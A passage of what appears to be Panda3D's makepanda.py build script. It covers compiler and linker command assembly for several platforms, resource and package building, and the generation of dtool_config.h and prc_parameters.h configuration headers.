cmd += ' -bundle '
else:
install_name = '@loader_path/../lib/' + os.path.basename(dll)
cmd += ' -dynamiclib -install_name ' + install_name
cmd += ' -compatibility_version ' + MAJOR_VERSION + ' -current_version ' + VERSION
cmd += ' -o ' + dll + ' -L' + GetOutputDir() + '/lib -L' + GetOutputDir() + '/tmp'
else:
cmd = cxx + ' -shared'
# Always set soname on Android to avoid a linker warning when loading the library.
if "MODULE" not in opts or GetTarget() == 'android':
cmd += " -Wl,-soname=" + os.path.basename(dll)
cmd += ' -o ' + dll + ' -L' + GetOutputDir() + '/lib -L' + GetOutputDir() + '/tmp'
for x in obj:
if GetOrigExt(x) != ".dat":
cmd += ' ' + x
if (GetOrigExt(dll) == ".exe" and GetTarget() == 'windows' and "NOICON" not in opts):
cmd += " " + GetOutputDir() + "/tmp/pandaIcon.res"
# Mac OS X specific flags.
if GetTarget() == 'darwin':
cmd += " -headerpad_max_install_names"
if OSXTARGET is not None:
cmd += " -isysroot " + SDK["MACOSX"] + " -Wl,-syslibroot," + SDK["MACOSX"]
cmd += " -mmacosx-version-min=%d.%d" % (OSXTARGET)
for arch in OSX_ARCHS:
if 'NOARCH:' + arch.upper() not in opts:
cmd += " -arch %s" % arch
elif GetTarget() == 'android':
arch = GetTargetArch()
if "ANDROID_GCC_TOOLCHAIN" in SDK:
cmd += ' -gcc-toolchain ' + SDK["ANDROID_GCC_TOOLCHAIN"].replace('\\', '/')
cmd += " -Wl,-z,noexecstack -Wl,-z,relro -Wl,-z,now"
if arch == 'armv7a':
cmd += ' -target armv7-none-linux-androideabi'
cmd += " -march=armv7-a -Wl,--fix-cortex-a8"
elif arch == 'arm':
cmd += ' -target armv5te-none-linux-androideabi'
elif arch == 'aarch64':
cmd += ' -target aarch64-none-linux-android'
elif arch == 'mips':
cmd += ' -target mipsel-none-linux-android'
cmd += ' -mips32'
elif arch == 'mips64':
cmd += ' -target mips64el-none-linux-android'
elif arch == 'x86':
cmd += ' -target i686-none-linux-android'
elif arch == 'x86_64':
cmd += ' -target x86_64-none-linux-android'
cmd += ' -lc -lm'
else:
cmd += " -pthread"
if "SYSROOT" in SDK:
cmd += " --sysroot=%s -no-canonical-prefixes" % (SDK["SYSROOT"])
if LDFLAGS != "":
cmd += " " + LDFLAGS
# Don't link libraries with Python, except on Android.
if "PYTHON" in opts and GetOrigExt(dll) != ".exe" and not RTDIST and GetTarget() != 'android':
opts = opts[:]
opts.remove("PYTHON")
for (opt, dir) in LIBDIRECTORIES:
if (opt=="ALWAYS") or (opt in opts):
cmd += ' -L' + BracketNameWithQuotes(dir)
for (opt, dir) in FRAMEWORKDIRECTORIES:
if (opt=="ALWAYS") or (opt in opts):
cmd += ' -F' + BracketNameWithQuotes(dir)
for (opt, name) in LIBNAMES:
if (opt=="ALWAYS") or (opt in opts):
cmd += ' ' + BracketNameWithQuotes(name)
if GetTarget() != 'freebsd':
cmd += " -ldl"
oscmd(cmd)
if GetOptimizeOption(opts) == 4 and GetTarget() in ('linux', 'android'):
oscmd(GetStrip() + " --strip-unneeded " + BracketNameWithQuotes(dll))
os.system("chmod +x " + BracketNameWithQuotes(dll))
if dll.endswith("." + MAJOR_VERSION + ".dylib"):
newdll = dll[:-6-len(MAJOR_VERSION)] + "dylib"
if os.path.isfile(newdll):
os.remove(newdll)
oscmd("ln -s " + BracketNameWithQuotes(os.path.basename(dll)) + " " + BracketNameWithQuotes(newdll))
elif dll.endswith("." + MAJOR_VERSION):
newdll = dll[:-len(MAJOR_VERSION)-1]
if os.path.isfile(newdll):
os.remove(newdll)
oscmd("ln -s " + BracketNameWithQuotes(os.path.basename(dll)) + " " + BracketNameWithQuotes(newdll))
##########################################################################################
#
# CompileEgg
#
##########################################################################################
def CompileEgg(eggfile, src, opts):
pz = False
if eggfile.endswith(".pz"):
pz = True
eggfile = eggfile[:-3]
# Determine the location of the pzip and flt2egg tools.
if CrossCompiling():
# We may not be able to use our generated versions of these tools,
# so we'll expect them to already be present in the PATH.
pzip = 'pzip'
flt2egg = 'flt2egg'
else:
# If we're compiling for this machine, we can use the binaries we've built.
pzip = os.path.join(GetOutputDir(), 'bin', 'pzip')
flt2egg = os.path.join(GetOutputDir(), 'bin', 'flt2egg')
if not os.path.isfile(pzip):
pzip = 'pzip'
if not os.path.isfile(flt2egg):
flt2egg = 'flt2egg'
if src.endswith(".egg"):
CopyFile(eggfile, src)
elif src.endswith(".flt"):
oscmd(flt2egg + ' -ps keep -o ' + BracketNameWithQuotes(eggfile) + ' ' + BracketNameWithQuotes(src))
if pz:
oscmd(pzip + ' ' + BracketNameWithQuotes(eggfile))
##########################################################################################
#
# CompileRes, CompileRsrc
#
##########################################################################################
def CompileRes(target, src, opts):
"""Compiles a Windows .rc file into a .res file."""
ipath = GetListOption(opts, "DIR:")
if (COMPILER == "MSVC"):
cmd = "rc"
cmd += " /Fo" + BracketNameWithQuotes(target)
for x in ipath: cmd += " /I" + x
for (opt,dir) in INCDIRECTORIES:
if (opt=="ALWAYS") or (opt in opts):
cmd += " /I" + BracketNameWithQuotes(dir)
for (opt,var,val) in DEFSYMBOLS:
if (opt=="ALWAYS") or (opt in opts):
cmd += " /D" + var + "=" + val
cmd += " " + BracketNameWithQuotes(src)
else:
cmd = "windres"
for x in ipath: cmd += " -I" + x
for (opt,dir) in INCDIRECTORIES:
if (opt=="ALWAYS") or (opt in opts):
cmd += " -I" + BracketNameWithQuotes(dir)
for (opt,var,val) in DEFSYMBOLS:
if (opt=="ALWAYS") or (opt in opts):
cmd += " -D" + var + "=" + val
cmd += " -i " + BracketNameWithQuotes(src)
cmd += " -o " + BracketNameWithQuotes(target)
oscmd(cmd)
def CompileRsrc(target, src, opts):
"""Compiles a Mac OS .r file into an .rsrc file."""
ipath = GetListOption(opts, "DIR:")
if os.path.isfile("/usr/bin/Rez"):
cmd = "Rez -useDF"
else:
cmd = "/Developer/Tools/Rez -useDF"
cmd += " -o " + BracketNameWithQuotes(target)
for x in ipath:
cmd += " -i " + x
for (opt,dir) in INCDIRECTORIES:
if (opt=="ALWAYS") or (opt in opts):
cmd += " -i " + BracketNameWithQuotes(dir)
for (opt,var,val) in DEFSYMBOLS:
if (opt=="ALWAYS") or (opt in opts):
if (val == ""):
cmd += " -d " + var
else:
cmd += " -d " + var + " = " + val
cmd += " " + BracketNameWithQuotes(src)
oscmd(cmd)
##########################################################################################
#
# CompileJava (Android only)
#
##########################################################################################
def CompileJava(target, src, opts):
"""Compiles a .java file into a .class file."""
cmd = "ecj "
optlevel = GetOptimizeOption(opts)
if optlevel >= 4:
cmd += "-debug:none "
cmd += "-cp " + GetOutputDir() + "/classes "
cmd += "-d " + GetOutputDir() + "/classes "
cmd += BracketNameWithQuotes(src)
oscmd(cmd)
##########################################################################################
#
# FreezePy
#
##########################################################################################
def FreezePy(target, inputs, opts):
assert len(inputs) > 0
cmdstr = BracketNameWithQuotes(SDK["PYTHONEXEC"].replace('\\', '/')) + " "
if sys.version_info >= (2, 6):
cmdstr += "-B "
cmdstr += os.path.join(GetOutputDir(), "direct", "showutil", "pfreeze.py")
if 'FREEZE_STARTUP' in opts:
cmdstr += " -s"
if GetOrigExt(target) == '.exe':
src = inputs.pop(0)
else:
src = ""
for i in inputs:
i = os.path.splitext(i)[0]
i = i.replace('/', '.')
if i.startswith('direct.src'):
i = i.replace('.src.', '.')
cmdstr += " -i " + i
cmdstr += " -o " + target + " " + src
if ("LINK_PYTHON_STATIC" in opts):
os.environ["LINK_PYTHON_STATIC"] = "1"
oscmd(cmdstr)
if ("LINK_PYTHON_STATIC" in os.environ):
del os.environ["LINK_PYTHON_STATIC"]
if (not os.path.exists(target)):
exit("FREEZER_ERROR")
##########################################################################################
#
# Package
#
##########################################################################################
def Package(target, inputs, opts):
assert len(inputs) == 1
# Invoke the ppackage script.
command = BracketNameWithQuotes(SDK["PYTHONEXEC"]) + " "
if GetOptimizeOption(opts) >= 4:
command += "-OO "
if sys.version_info >= (2, 6):
command += "-B "
command += "direct/src/p3d/ppackage.py"
if not RTDIST:
# Don't compile Python sources, because we might not running in the same
# Python version as the selected host.
command += " -N"
if GetTarget() == "darwin":
if SDK.get("MACOSX"):
command += " -R \"%s\"" % SDK["MACOSX"]
for arch in OSX_ARCHS:
if arch == "x86_64":
arch = "amd64"
command += " -P osx_%s" % arch
command += " -i \"" + GetOutputDir() + "/stage\""
if (P3DSUFFIX):
command += ' -a "' + P3DSUFFIX + '"'
command += " " + inputs[0]
if GetOrigExt(target) == '.p3d':
# Build a specific .p3d file.
basename = os.path.basename(os.path.splitext(target)[0])
command += " " + basename
oscmd(command)
if GetTarget() == 'windows':
# Make an .exe that calls this .p3d.
objfile = FindLocation('p3dWrapper_' + basename + '.obj', [])
CompileCxx(objfile, 'direct/src/p3d/p3dWrapper.c', [])
exefile = FindLocation(basename + '.exe', [])
CompileLink(exefile, [objfile], ['ADVAPI'])
# Move it to the bin directory.
os.rename(GetOutputDir() + '/stage/' + basename + P3DSUFFIX + '.p3d', target)
if sys.platform != 'win32':
oscmd('chmod +x ' + BracketNameWithQuotes(target))
else:
# This is presumably a package or set of packages.
oscmd(command)
##########################################################################################
#
# CompileBundle
#
##########################################################################################
def CompileBundle(target, inputs, opts):
assert GetTarget() == "darwin", 'bundles can only be made for Mac OS X'
plist = None
resources = []
objects = []
for i in inputs:
if (i.endswith(".plist")):
if (plist != None): exit("Only one plist file can be used when creating a bundle!")
plist = i
elif (i.endswith(".rsrc") or i.endswith(".icns")):
resources.append(i)
elif (GetOrigExt(i) == ".obj" or GetOrigExt(i) in SUFFIX_LIB or GetOrigExt(i) in SUFFIX_DLL):
objects.append(i)
else:
exit("Don't know how to bundle file %s" % i)
# Now link the object files to form the bundle.
if (plist == None): exit("One plist file must be used when creating a bundle!")
bundleName = plistlib.readPlist(plist)["CFBundleExecutable"]
oscmd("rm -rf %s" % target)
oscmd("mkdir -p %s/Contents/MacOS/" % target)
oscmd("mkdir -p %s/Contents/Resources/" % target)
if target.endswith(".app"):
SetOrigExt("%s/Contents/MacOS/%s" % (target, bundleName), ".exe")
else:
SetOrigExt("%s/Contents/MacOS/%s" % (target, bundleName), ".dll")
CompileLink("%s/Contents/MacOS/%s" % (target, bundleName), objects, opts + ["BUNDLE"])
oscmd("cp %s %s/Contents/Info.plist" % (plist, target))
for r in resources:
oscmd("cp %s %s/Contents/Resources/" % (r, target))
##########################################################################################
#
# CompileMIDL
#
##########################################################################################
def CompileMIDL(target, src, opts):
ipath = GetListOption(opts, "DIR:")
if (COMPILER=="MSVC"):
cmd = "midl"
cmd += " /out" + BracketNameWithQuotes(os.path.dirname(target))
for x in ipath: cmd += " /I" + x
for (opt,dir) in INCDIRECTORIES:
if (opt=="ALWAYS") or (opt in opts): cmd += " /I" + BracketNameWithQuotes(dir)
for (opt,var,val) in DEFSYMBOLS:
if (opt=="ALWAYS") or (opt in opts): cmd += " /D" + var + "=" + val
cmd += " " + BracketNameWithQuotes(src)
oscmd(cmd)
##########################################################################################
#
# CompileAnything
#
##########################################################################################
def CompileAnything(target, inputs, opts, progress = None):
if (opts.count("DEPENDENCYONLY")):
return
if (len(inputs)==0):
exit("No input files for target "+target)
infile = inputs[0]
origsuffix = GetOrigExt(target)
if (len(inputs) == 1 and origsuffix == GetOrigExt(infile)):
# It must be a simple copy operation.
ProgressOutput(progress, "Copying file", target)
CopyFile(target, infile)
if (origsuffix==".exe" and GetHost() != "windows"):
os.system("chmod +x \"%s\"" % target)
return
elif (infile.endswith(".py")):
if origsuffix == ".obj":
source = os.path.splitext(target)[0] + ".c"
SetOrigExt(source, ".c")
ProgressOutput(progress, "Building frozen source", source)
FreezePy(source, inputs, opts)
ProgressOutput(progress, "Building C++ object", target)
return CompileCxx(target, source, opts)
if origsuffix == ".exe":
ProgressOutput(progress, "Building frozen executable", target)
else:
ProgressOutput(progress, "Building frozen library", target)
return FreezePy(target, inputs, opts)
elif (infile.endswith(".idl")):
ProgressOutput(progress, "Compiling MIDL file", infile)
return CompileMIDL(target, infile, opts)
elif (infile.endswith(".pdef")):
if origsuffix == '.p3d':
ProgressOutput(progress, "Building package", target)
else:
ProgressOutput(progress, "Building package from pdef file", infile)
return Package(target, inputs, opts)
elif origsuffix in SUFFIX_LIB:
ProgressOutput(progress, "Linking static library", target)
return CompileLib(target, inputs, opts)
elif origsuffix in SUFFIX_DLL or (origsuffix==".plugin" and GetTarget() != "darwin"):
if (origsuffix==".exe"):
ProgressOutput(progress, "Linking executable", target)
else:
ProgressOutput(progress, "Linking dynamic library", target)
# Add version number to the dynamic library, on unix
if origsuffix == ".dll" and "MODULE" not in opts and not RTDIST:
tplatform = GetTarget()
if tplatform == "darwin":
# On Mac, libraries are named like libpanda.1.2.dylib
if target.lower().endswith(".dylib"):
target = target[:-5] + MAJOR_VERSION + ".dylib"
SetOrigExt(target, origsuffix)
elif tplatform != "windows" and tplatform != "android":
# On Linux, libraries are named like libpanda.so.1.2
target += "." + MAJOR_VERSION
SetOrigExt(target, origsuffix)
return CompileLink(target, inputs, opts)
elif (origsuffix==".in"):
ProgressOutput(progress, "Building Interrogate database", target)
args = CompileIgate(target, inputs, opts)
ProgressOutput(progress, "Building C++ object", args[0])
return CompileCxx(*args)
elif (origsuffix==".plugin" and GetTarget() == "darwin"):
ProgressOutput(progress, "Building plugin bundle", target)
return CompileBundle(target, inputs, opts)
elif (origsuffix==".app"):
ProgressOutput(progress, "Building application bundle", target)
return CompileBundle(target, inputs, opts)
elif (origsuffix==".pz"):
ProgressOutput(progress, "Compressing", target)
return CompileEgg(target, infile, opts)
elif (origsuffix==".egg"):
ProgressOutput(progress, "Converting", target)
return CompileEgg(target, infile, opts)
elif (origsuffix==".res"):
ProgressOutput(progress, "Building resource object", target)
return CompileRes(target, infile, opts)
elif (origsuffix==".rsrc"):
ProgressOutput(progress, "Building resource object", target)
return CompileRsrc(target, infile, opts)
elif (origsuffix==".class"):
ProgressOutput(progress, "Building Java class", target)
return CompileJava(target, infile, opts)
elif (origsuffix==".obj"):
if (infile.endswith(".cxx")):
ProgressOutput(progress, "Building C++ object", target)
return CompileCxx(target, infile, opts)
elif (infile.endswith(".c")):
ProgressOutput(progress, "Building C object", target)
return CompileCxx(target, infile, opts)
elif (infile.endswith(".mm")):
ProgressOutput(progress, "Building Objective-C++ object", target)
return CompileCxx(target, infile, opts)
elif (infile.endswith(".yxx")):
ProgressOutput(progress, "Building Bison object", target)
return CompileBison(target, infile, opts)
elif (infile.endswith(".lxx")):
ProgressOutput(progress, "Building Flex object", target)
return CompileFlex(target, infile, opts)
elif (infile.endswith(".in")):
ProgressOutput(progress, "Building Interrogate object", target)
return CompileImod(target, inputs, opts)
elif (infile.endswith(".rc")):
ProgressOutput(progress, "Building resource object", target)
return CompileRes(target, infile, opts)
elif (infile.endswith(".r")):
ProgressOutput(progress, "Building resource object", target)
return CompileRsrc(target, infile, opts)
exit("Don't know how to compile: %s from %s" % (target, inputs))
##########################################################################################
#
# Generate dtool_config.h, prc_parameters.h, and dtool_have_xxx.dat
#
##########################################################################################
DTOOL_CONFIG=[
#_Variable_________________________Windows___________________Unix__________
("HAVE_PYTHON", '1', '1'),
("USE_DEBUG_PYTHON", 'UNDEF', 'UNDEF'),
("PYTHON_FRAMEWORK", 'UNDEF', 'UNDEF'),
("COMPILE_IN_DEFAULT_FONT", '1', '1'),
("STDFLOAT_DOUBLE", 'UNDEF', 'UNDEF'),
("HAVE_MAYA", '1', '1'),
("HAVE_SOFTIMAGE", 'UNDEF', 'UNDEF'),
("REPORT_OPENSSL_ERRORS", '1', '1'),
("USE_PANDAFILESTREAM", '1', '1'),
("USE_DELETED_CHAIN", '1', '1'),
("HAVE_GLX", 'UNDEF', '1'),
("HAVE_WGL", '1', 'UNDEF'),
("HAVE_DX9", 'UNDEF', 'UNDEF'),
("HAVE_THREADS", '1', '1'),
("SIMPLE_THREADS", 'UNDEF', 'UNDEF'),
("OS_SIMPLE_THREADS", '1', '1'),
("DEBUG_THREADS", 'UNDEF', 'UNDEF'),
("HAVE_POSIX_THREADS", 'UNDEF', '1'),
("HAVE_AUDIO", '1', '1'),
("NOTIFY_DEBUG", 'UNDEF', 'UNDEF'),
("DO_PSTATS", 'UNDEF', 'UNDEF'),
("DO_DCAST", 'UNDEF', 'UNDEF'),
("DO_COLLISION_RECORDING", 'UNDEF', 'UNDEF'),
("SUPPORT_IMMEDIATE_MODE", 'UNDEF', 'UNDEF'),
("SUPPORT_FIXED_FUNCTION", '1', '1'),
("DO_MEMORY_USAGE", 'UNDEF', 'UNDEF'),
("DO_PIPELINING", '1', '1'),
("DEFAULT_PATHSEP", '";"', '":"'),
("WORDS_BIGENDIAN", 'UNDEF', 'UNDEF'),
("HAVE_OPEN_MASK", 'UNDEF', 'UNDEF'),
("HAVE_LOCKF", '1', '1'),
("HAVE_WCHAR_T", '1', '1'),
("HAVE_WSTRING", '1', '1'),
("SIMPLE_STRUCT_POINTERS", '1', 'UNDEF'),
("HAVE_DINKUM", 'UNDEF', 'UNDEF'),
("HAVE_STL_HASH", 'UNDEF', 'UNDEF'),
("GETTIMEOFDAY_ONE_PARAM", 'UNDEF', 'UNDEF'),
("HAVE_GETOPT", 'UNDEF', '1'),
("HAVE_GETOPT_LONG_ONLY", 'UNDEF', '1'),
("PHAVE_GETOPT_H", 'UNDEF', '1'),
("PHAVE_LINUX_INPUT_H", 'UNDEF', '1'),
("IOCTL_TERMINAL_WIDTH", 'UNDEF', '1'),
("HAVE_STREAMSIZE", '1', '1'),
("HAVE_IOS_TYPEDEFS", '1', '1'),
("HAVE_IOS_BINARY", '1', '1'),
("STATIC_INIT_GETENV", '1', 'UNDEF'),
("HAVE_PROC_SELF_EXE", 'UNDEF', '1'),
("HAVE_PROC_SELF_MAPS", 'UNDEF', '1'),
("HAVE_PROC_SELF_ENVIRON", 'UNDEF', '1'),
("HAVE_PROC_SELF_CMDLINE", 'UNDEF', '1'),
("HAVE_PROC_CURPROC_FILE", 'UNDEF', 'UNDEF'),
("HAVE_PROC_CURPROC_MAP", 'UNDEF', 'UNDEF'),
("HAVE_PROC_SELF_CMDLINE", 'UNDEF', 'UNDEF'),
("HAVE_GLOBAL_ARGV", '1', 'UNDEF'),
("PROTOTYPE_GLOBAL_ARGV", 'UNDEF', 'UNDEF'),
("GLOBAL_ARGV", '__argv', 'UNDEF'),
("GLOBAL_ARGC", '__argc', 'UNDEF'),
("PHAVE_IO_H", '1', 'UNDEF'),
("PHAVE_IOSTREAM", '1', '1'),
("PHAVE_STRING_H", 'UNDEF', '1'),
("PHAVE_LIMITS_H", 'UNDEF', '1'),
("PHAVE_STDLIB_H", 'UNDEF', '1'),
("PHAVE_MALLOC_H", '1', '1'),
("PHAVE_SYS_MALLOC_H", 'UNDEF', 'UNDEF'),
("PHAVE_ALLOCA_H", 'UNDEF', '1'),
("PHAVE_LOCALE_H", 'UNDEF', '1'),
("PHAVE_MINMAX_H", '1', 'UNDEF'),
("PHAVE_SSTREAM", '1', '1'),
("PHAVE_NEW", '1', '1'),
("PHAVE_SYS_TYPES_H", '1', '1'),
("PHAVE_SYS_TIME_H", 'UNDEF', '1'),
("PHAVE_UNISTD_H", 'UNDEF', '1'),
("PHAVE_UTIME_H", 'UNDEF', '1'),
("PHAVE_GLOB_H", 'UNDEF', '1'),
("PHAVE_DIRENT_H", 'UNDEF', '1'),
("PHAVE_SYS_SOUNDCARD_H", 'UNDEF', '1'),
("PHAVE_UCONTEXT_H", 'UNDEF', '1'),
("PHAVE_STDINT_H", '1', '1'),
("HAVE_RTTI", '1', '1'),
("HAVE_X11", 'UNDEF', '1'),
("IS_LINUX", 'UNDEF', '1'),
("IS_OSX", 'UNDEF', 'UNDEF'),
("IS_FREEBSD", 'UNDEF', 'UNDEF'),
("HAVE_EIGEN", 'UNDEF', 'UNDEF'),
("LINMATH_ALIGN", '1', '1'),
("HAVE_ZLIB", 'UNDEF', 'UNDEF'),
("HAVE_PNG", 'UNDEF', 'UNDEF'),
("HAVE_JPEG", 'UNDEF', 'UNDEF'),
("PHAVE_JPEGINT_H", '1', '1'),
("HAVE_VIDEO4LINUX", 'UNDEF', '1'),
("HAVE_TIFF", 'UNDEF', 'UNDEF'),
("HAVE_OPENEXR", 'UNDEF', 'UNDEF'),
("HAVE_SGI_RGB", '1', '1'),
("HAVE_TGA", '1', '1'),
("HAVE_IMG", '1', '1'),
("HAVE_SOFTIMAGE_PIC", '1', '1'),
("HAVE_BMP", '1', '1'),
("HAVE_PNM", '1', '1'),
("HAVE_STB_IMAGE", '1', '1'),
("HAVE_VORBIS", 'UNDEF', 'UNDEF'),
("HAVE_OPUS", 'UNDEF', 'UNDEF'),
("HAVE_FREETYPE", 'UNDEF', 'UNDEF'),
("HAVE_FFTW", 'UNDEF', 'UNDEF'),
("HAVE_OPENSSL", 'UNDEF', 'UNDEF'),
("HAVE_NET", 'UNDEF', 'UNDEF'),
("WANT_NATIVE_NET", '1', '1'),
("SIMULATE_NETWORK_DELAY", 'UNDEF', 'UNDEF'),
("HAVE_CG", 'UNDEF', 'UNDEF'),
("HAVE_CGGL", 'UNDEF', 'UNDEF'),
("HAVE_CGDX9", 'UNDEF', 'UNDEF'),
("HAVE_ARTOOLKIT", 'UNDEF', 'UNDEF'),
("HAVE_DIRECTCAM", 'UNDEF', 'UNDEF'),
("HAVE_SQUISH", 'UNDEF', 'UNDEF'),
("HAVE_CARBON", 'UNDEF', 'UNDEF'),
("HAVE_COCOA", 'UNDEF', 'UNDEF'),
("HAVE_OPENAL_FRAMEWORK", 'UNDEF', 'UNDEF'),
("HAVE_ROCKET_PYTHON", '1', '1'),
("HAVE_ROCKET_DEBUGGER", 'UNDEF', 'UNDEF'),
("USE_TAU", 'UNDEF', 'UNDEF'),
("PRC_SAVE_DESCRIPTIONS", '1', '1'),
# ("_SECURE_SCL", '0', 'UNDEF'),
# ("_SECURE_SCL_THROWS", '0', 'UNDEF'),
("HAVE_P3D_PLUGIN", 'UNDEF', 'UNDEF'),
]
PRC_PARAMETERS=[
("DEFAULT_PRC_DIR", '"<auto>etc"', '"<auto>etc"'),
("PRC_DIR_ENVVARS", '"PANDA_PRC_DIR"', '"PANDA_PRC_DIR"'),
("PRC_PATH_ENVVARS", '"PANDA_PRC_PATH"', '"PANDA_PRC_PATH"'),
("PRC_PATH2_ENVVARS", '""', '""'),
("PRC_PATTERNS", '"*.prc"', '"*.prc"'),
("PRC_ENCRYPTED_PATTERNS", '"*.prc.pe"', '"*.prc.pe"'),
("PRC_ENCRYPTION_KEY", '""', '""'),
("PRC_EXECUTABLE_PATTERNS", '""', '""'),
("PRC_EXECUTABLE_ARGS_ENVVAR", '"PANDA_PRC_XARGS"', '"PANDA_PRC_XARGS"'),
("PRC_PUBLIC_KEYS_FILENAME", '""', '""'),
("PRC_RESPECT_TRUST_LEVEL", 'UNDEF', 'UNDEF'),
("PRC_DCONFIG_TRUST_LEVEL", '0', '0'),
("PRC_INC_TRUST_LEVEL", '0', '0'),
]
def WriteConfigSettings():
dtool_config={}
prc_parameters={}
speedtree_parameters={}
plugin_config={}
if (GetTarget() == 'windows'):
for key,win,unix in DTOOL_CONFIG:
dtool_config[key] = win
for key,win,unix in PRC_PARAMETERS:
prc_parameters[key] = win
else:
for key,win,unix in DTOOL_CONFIG:
dtool_config[key] = unix
for key,win,unix in PRC_PARAMETERS:
prc_parameters[key] = unix
for x in PkgListGet():
if ("HAVE_"+x in dtool_config):
if (PkgSkip(x)==0):
dtool_config["HAVE_"+x] = '1'
else:
dtool_config["HAVE_"+x] = 'UNDEF'
dtool_config["HAVE_NET"] = '1'
if (PkgSkip("NVIDIACG")==0):
dtool_config["HAVE_CG"] = '1'
dtool_config["HAVE_CGGL"] = '1'
dtool_config["HAVE_CGDX9"] = '1'
if GetTarget() not in ("linux", "android"):
dtool_config["HAVE_PROC_SELF_EXE"] = 'UNDEF'
dtool_config["HAVE_PROC_SELF_MAPS"] = 'UNDEF'
dtool_config["HAVE_PROC_SELF_CMDLINE"] = 'UNDEF'
dtool_config["HAVE_PROC_SELF_ENVIRON"] = 'UNDEF'
if (GetTarget() == "darwin"):
dtool_config["PYTHON_FRAMEWORK"] = 'Python'
dtool_config["PHAVE_MALLOC_H"] = 'UNDEF'
dtool_config["PHAVE_SYS_MALLOC_H"] = '1'
dtool_config["HAVE_OPENAL_FRAMEWORK"] = '1'
dtool_config["HAVE_X11"] = 'UNDEF' # We might have X11, but we don't need it.
dtool_config["HAVE_GLX"] = 'UNDEF'
dtool_config["IS_LINUX"] = 'UNDEF'
dtool_config["HAVE_VIDEO4LINUX"] = 'UNDEF'
dtool_config["IS_OSX"] = '1'
# 10.4 had a broken ucontext implementation
if int(platform.mac_ver()[0][3]) <= 4:
dtool_config["PHAVE_UCONTEXT_H"] = 'UNDEF'
if (GetTarget() == "freebsd"):
dtool_config["IS_LINUX"] = 'UNDEF'
dtool_config["HAVE_VIDEO4LINUX"] = 'UNDEF'
dtool_config["IS_FREEBSD"] = '1'
dtool_config["PHAVE_ALLOCA_H"] = 'UNDEF'
dtool_config["PHAVE_MALLOC_H"] = 'UNDEF'
dtool_config["PHAVE_LINUX_INPUT_H"] = 'UNDEF'
dtool_config["HAVE_PROC_CURPROC_FILE"] = '1'
dtool_config["HAVE_PROC_CURPROC_MAP"] = '1'
dtool_config["HAVE_PROC_CURPROC_CMDLINE"] = '1'
if (GetTarget() == "android"):
# Android does have RTTI, but we disable it anyway.
dtool_config["HAVE_RTTI"] = 'UNDEF'
dtool_config["PHAVE_GLOB_H"] = 'UNDEF'
dtool_config["HAVE_LOCKF"] = 'UNDEF'
dtool_config["HAVE_VIDEO4LINUX"] = 'UNDEF'
if (GetOptimize() <= 2 and GetTarget() == "windows"):
dtool_config["USE_DEBUG_PYTHON"] = '1'
# This should probably be more sophisticated, such as based
# on whether the libRocket Python modules are available.
if (PkgSkip("PYTHON") != 0):
dtool_config["HAVE_ROCKET_PYTHON"] = 'UNDEF'
if (GetOptimize() <= 3):
dtool_config["HAVE_ROCKET_DEBUGGER"] = '1'
if (GetOptimize() <= 3):
if (dtool_config["HAVE_NET"] != 'UNDEF'):
dtool_config["DO_PSTATS"] = '1'
if (GetOptimize() <= 3):
dtool_config["DO_DCAST"] = '1'
if (GetOptimize() <= 3):
dtool_config["DO_COLLISION_RECORDING"] = '1'
if (GetOptimize() <= 3):
dtool_config["DO_MEMORY_USAGE"] = '1'
if (GetOptimize() <= 3):
dtool_config["NOTIFY_DEBUG"] = '1'
if (GetOptimize() >= 4):
dtool_config["PRC_SAVE_DESCRIPTIONS"] = 'UNDEF'
if (GetOptimize() >= 4):
# Disable RTTI on release builds.
dtool_config["HAVE_RTTI"] = 'UNDEF'
# Now that we have OS_SIMPLE_THREADS, we can support
# SIMPLE_THREADS on exotic architectures like win64, so we no
# longer need to disable it for this platform.
## if GetTarget() == 'windows' and GetTargetArch() == 'x64':
## dtool_config["SIMPLE_THREADS"] = 'UNDEF'
if (RTDIST or RUNTIME):
prc_parameters["DEFAULT_PRC_DIR"] = '""'
if HOST_URL:
plugin_config["PANDA_PACKAGE_HOST_URL"] = HOST_URL
#plugin_config["P3D_PLUGIN_LOG_DIRECTORY"] = ""
plugin_config["P3D_PLUGIN_LOG_BASENAME1"] = ""
plugin_config["P3D_PLUGIN_LOG_BASENAME2"] = ""
plugin_config["P3D_PLUGIN_LOG_BASENAME3"] = ""
plugin_config["P3D_PLUGIN_P3D_PLUGIN"] = ""
plugin_config["P3D_PLUGIN_P3DPYTHON"] = ""
plugin_config["P3D_COREAPI_VERSION_STR"] = COREAPI_VERSION
plugin_config["P3D_PLUGIN_VERSION_STR"] = PLUGIN_VERSION
if PkgSkip("GTK2") == 0:
plugin_config["HAVE_GTK"] = '1'
if (RUNTIME):
dtool_config["HAVE_P3D_PLUGIN"] = '1'
# Whether it's present on the system doesn't matter here,
# as the runtime itself doesn't include or link with X11.
if (RUNTIME and GetTarget() == 'linux'):
dtool_config["HAVE_X11"] = '1'
if ("GENERIC_DXERR_LIBRARY" in SDK):
dtool_config["USE_GENERIC_DXERR_LIBRARY"] = "1"
else:
dtool_config["USE_GENERIC_DXERR_LIBRARY"] = "UNDEF"
if (PkgSkip("SPEEDTREE")==0):
speedtree_parameters["SPEEDTREE_OPENGL"] = "UNDEF"
speedtree_parameters["SPEEDTREE_DIRECTX9"] = "UNDEF"
if SDK["SPEEDTREEAPI"] == "OpenGL":
speedtree_parameters["SPEEDTREE_OPENGL"] = "1"
elif SDK["SPEEDTREEAPI"] == "DirectX9":
speedtree_parameters["SPEEDTREE_DIRECTX9"] = "1"
speedtree_parameters["SPEEDTREE_BIN_DIR"] = (SDK["SPEEDTREE"] + "/Bin")
conf = "/* prc_parameters.h. Generated automatically by makepanda.py */\n"
for key in sorted(prc_parameters.keys()):
if ((key == "DEFAULT_PRC_DIR") or (key[:4]=="PRC_")):
val = OverrideValue(key, prc_parameters[key])
if (val == 'UNDEF'): conf = conf + "#undef " + key + "\n"
else: conf = conf + "#define " + key + " " + val + "\n"
ConditionalWriteFile(GetOutputDir() + '/include/prc_parameters.h', conf)
conf = "/* dtool_config.h. Generated automatically by makepanda.py */\n"
for key in sorted(dtool_config.keys()):
val = OverrideValue(key, dtool_config[key])
if (val == 'UNDEF'): conf = conf + "#undef " + key + "\n"
else: conf = conf + "#define " + key + " " + val + "\n"
ConditionalWriteFile(GetOutputDir() + '/include/dtool_config.h', conf)
if (RTDIST or RUNTIME):
conf = "/* p3d_plugin_config.h. Generated automatically by makepanda.py */\n"
for key in sorted(plugin_config.keys()):
val = plugin_config[key]
if (val == 'UNDEF'): conf = conf + "#undef " + key + "\n"
else: conf = conf + "#define " + key + " \"" + val.replace("\\", "\\\\") + "\"\n"
